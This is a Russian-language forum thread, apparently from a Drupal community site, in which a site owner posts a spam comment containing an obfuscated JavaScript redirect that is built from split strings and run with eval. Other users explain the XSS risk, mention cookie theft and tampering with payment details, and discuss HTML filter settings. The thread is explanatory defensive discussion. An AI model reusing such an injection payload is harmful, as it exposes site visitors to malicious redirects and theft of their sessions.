Отправили вот такие коменты.

Аватар пользователя Evgenij Evgenij 6 апреля 2008 в 15:08

Отправили вот такие коменты.

IP Address: 89.41.87.241
Name: Anonymous
Email address: play123@mail.ru
URL: Comment:

<SCRIPT language=JavaScript>
var oou = "location.";
var ouu = "replace('h";
var .uc = "ine.net/co";
var ouu = "mment/repl";
var cb. = "y/91')";
var obu = "ttp://best";
var cb. = "libraryonl";
eval(oou+ouu+obu+cb.+.uc+ouu+cb.);
</SCRIPT>

Что это попытка взлома?

Комментарии

Аватар пользователя KalanSPb KalanSPb 6 апреля 2008 в 16:07

Не совсем взлом, вашему сайту угрожает только потеря посетителей. Если фильтрация HTML не включена и SCRIPT не запрещен, то пользователь будет перенаправлен на bestine.net

Но практически также можно похитить куки пользователя (что часто практически равносильно взлому пользовательского, в том числе админского, аккаунта) или полностью (частично) заменить содержимое страницы, например номера webmoney кошельков или адрес ссылки "оформить заказ", пользователь может и не проверить аттестат или не обратить внимание, что адрес сайта уже сменился

Аватар пользователя Bufo Bufo 6 апреля 2008 в 17:09

>Если фильтрация HTML не включена и SCRIPT не запрещен
А по умолчанию это включено чтоли в движке? Smile

Аватар пользователя KalanSPb KalanSPb 6 апреля 2008 в 17:34

По умолчанию нет, но часто не знают о последствиях, думая, например, что Full HTML просто позволяет линки вставлять да текст форматировать как угодно

Аватар пользователя Bufo Bufo 6 апреля 2008 в 17:40

По умолчанию нет, но часто не знают о последствиях, думая, например, что Full HTML просто позволяет линки вставлять да текст форматировать как угодно

Находка для дорвейной братии... Редирект buy phentermine online на umaxsearch так и просится Lol

Аватар пользователя OLEGator09@drupal.org OLEGator09@drup... 8 января 2009 в 22:35

"KalanSPb" wrote:
По умолчанию нет, но часто не знают о последствиях, думая, например, что Full HTML просто позволяет линки вставлять да текст форматировать как угодно

А как же быть, если нужно использовать модуль imce ???
Ведь этот модуль не будет работать, если не включен Full HTML....

Аватар пользователя Химический Али Химический Али 9 января 2009 в 0:56

"<a href="mailto:OLEGator09@drupal.org">OLEGator09@drupal.org</a>" wrote:
Ведь этот модуль не будет работать, если не включен Full HTML....

подумайте и заберите свои слова обратно